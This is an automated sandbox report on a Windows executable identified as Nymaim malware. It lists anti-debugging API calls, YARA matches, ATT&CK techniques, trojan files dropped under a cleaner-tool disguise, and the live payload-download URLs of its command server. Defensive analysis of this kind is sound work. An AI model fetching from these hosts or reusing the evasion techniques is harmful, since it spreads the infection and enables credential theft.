Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]		0_2_10007A76
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]		0_2_10005F25
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04947D41 push dword ptr fs:[00000030h]		0_2_04947D41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A20D90 mov eax, dword ptr fs:[00000030h]		0_2_04A20D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2092B mov eax, dword ptr fs:[00000030h]		0_2_04A2092B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402EE0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00409A2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0040A58A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A720 SetUnhandledExceptionFilter,		0_2_0040A720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_100056A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_10002FDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A29C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_04A29C91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04A2A7F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04A2D04A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2A987 SetUnhandledExceptionFilter,		0_2_04A2A987

Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: pQProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040A2EC cpuid

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 0.2.file.exe.4a20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	781 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	24 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	13 Software Packing	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.156.72.65/files/download65/files/download-e433ee860fe502924bLMEM	0%	Avira URL Cloud	safe
http://185.156.72.65/dll/downloadQ	0%	Avira URL Cloud	safe
http://185.156.72.65/dll/downloadG	0%	Avira URL Cloud	safe
http://185.156.72.65/files/downloadN	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.156.72.65/soft/download	false		high
http://185.156.72.65/dll/download	false		high
http://185.156.72.65/dll/key	false		high
http://185.156.72.65/files/download	false		high
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.156.72.65/files/download65/files/download-e433ee860fe502924bLMEM	file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.156.72.65/dll/downloadG	file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g-cleanit.hk	file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.72.65/dll/downloadQ	file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.13.dr	false		high
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.72.65/files/downloadN	file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1Pz8p7	file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.156.72.65	unknown	Russian Federation		44636	ITDELUXE-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565422
Start date and time:	2024-11-29 19:49:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/15@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
15:13:08	API Interceptor	62x Sleep call for process: file.exe modified
15:13:48	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.156.72.65	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65/soft/download
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc	Browse	185.156.72.65/files/download
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65/soft/download
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim	Browse	185.156.72.65/files/download
	file.exe	Get hash	malicious	Amadey, Nymaim, Stealc, Vidar	Browse	185.156.72.65/files/download
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65/soft/download
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65/soft/download
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.156.72.65/files/download
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65/soft/download
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.156.72.65/files/download

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITDELUXE-ASRU	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc	Browse	185.156.72.65
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim	Browse	185.156.72.65
	file.exe	Get hash	malicious	Amadey, Nymaim, Stealc, Vidar	Browse	185.156.72.65
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.156.72.65
	file.exe	Get hash	malicious	Nymaim	Browse	185.156.72.65
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.156.72.65

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse
	file.exe	Get hash	malicious	Nymaim	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_ba8a8a594ca8fa23cd1d4e3bee6863e38899ac_1ee2fc52_24ad378d-1248-43e8-844d-71fe83f31003\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9711271516419132
Encrypted:	false
SSDEEP:	192:/EwvUvaPY005odXP3jud3szuiFhZ24IO8TOB:ia65od/j3zuiFhY4IO8C
MD5:	1497D03AFB1C387333200CAFD925370C
SHA1:	1D0C89A6D00704CCD9A1A289F48D54B9C967B09B
SHA-256:	F9E0E5F474D2FED2359A5C90824D1EB07070FDB70762F394B9EE28400975CD35
SHA-512:	30C2B9023E04DFB06E3DB10DB51A491354954A15701861C6490F325B12A14BB74638C31069F162324E357919081B148FFF8226FE1F732DD7781A1FAE1A31A1E5
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.3.8.4.8.0.1.0.1.7.4.0.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.3.8.4.8.0.1.3.9.2.3.9.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.a.d.3.7.8.d.-.1.2.4.8.-.4.3.e.8.-.8.4.4.d.-.7.1.f.e.8.3.f.3.1.0.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.e.4.b.9.d.5.-.8.6.7.f.-.4.9.4.2.-.9.8.e.3.-.3.1.d.3.d.a.f.7.e.e.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.0.-.0.0.0.1.-.0.0.1.4.-.9.0.5.5.-.8.e.7.b.8.f.4.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.2.a.f.c.2.d.0.5.6.6.6.3.0.d.7.5.e.f.b.a.d.a.1.9.b.2.4.f.a.4.2.4.6.4.c.7.2.c.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43B4.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Nov 29 20:13:21 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	48680
Entropy (8bit):	2.616623364166876
Encrypted:	false
SSDEEP:	384:99uw0VUHjTiCP+TYXgkRRSXoiPpj8ULOnOW:9kwqSjTiCP+Mw6DiP5mO
MD5:	C58AA00A482EAADF45D7EDC4FB0AD1D1
SHA1:	6FDA30F75E366A1CBC529D55243F104F4482C5DA
SHA-256:	4017621E588BDA1FBFA75CB32343F9237ABAE2747921596CA0C77C94F4F9F1AC
SHA-512:	1B8875533AFDFB1F2C87419AE4C3BB9BF997E2A5652994077C9E17920C01E980F321956B919090C3E3B6EB2FD8C2BF2336D012890E6CAB8E5025BC7373477EFD
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......a Jg............4...........8...<............,..........T.......8...........T...........(B...\|..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.............Jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4471.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8300
Entropy (8bit):	3.6898134084389214
Encrypted:	false
SSDEEP:	192:R6l7wVeJtCo6G56YNQjSUqlOvLgmfBkqja7pDH89bm/sfOCm:R6lXJn6A6YujSUq8vLgmf7jaWmkfS
MD5:	B37838A82947A3157279B4448CCA95F0
SHA1:	FC801442FCF8049D6E1E17B23225761E72A6C5E9
SHA-256:	F0FB3A206C99570017C06055B2F73A6768C6E98CD98B71E27FC3F7D3944AABF5
SHA-512:	00E40B2D6C856DA75B6C45119710037273DED5D29A6C1DE50CBB89BBAB30523DBBEFDEB0D051A64EF9C905727A08BBDEE5040181D2EF121AB47242E43E499AFE
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4491.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.426863824132581
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg77aI9TZyWpW8VYpCoYm8M4JJlRFhF+q8xgJ+D94tid:uIjfpI7t57VzFJzLY0+D9qid
MD5:	699DB78F3DCF2471D8DD695F01776CBD
SHA1:	E5C5D7A3D1328C42439B055FC9B2B454F2C33178
SHA-256:	4C5D6B589C10B0B0ACA0839A94507048BCE965EA0D90AF3956311C2029A58275
SHA-512:	C0EDB31D537A54DB7E7860D2F94B0DCD07C983F1F7404E80E910D460FE78C1ADEE423A35200540A186E5944810FDE7CBC82759A02949DBDD125D81405992F8F0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="609796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\download[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
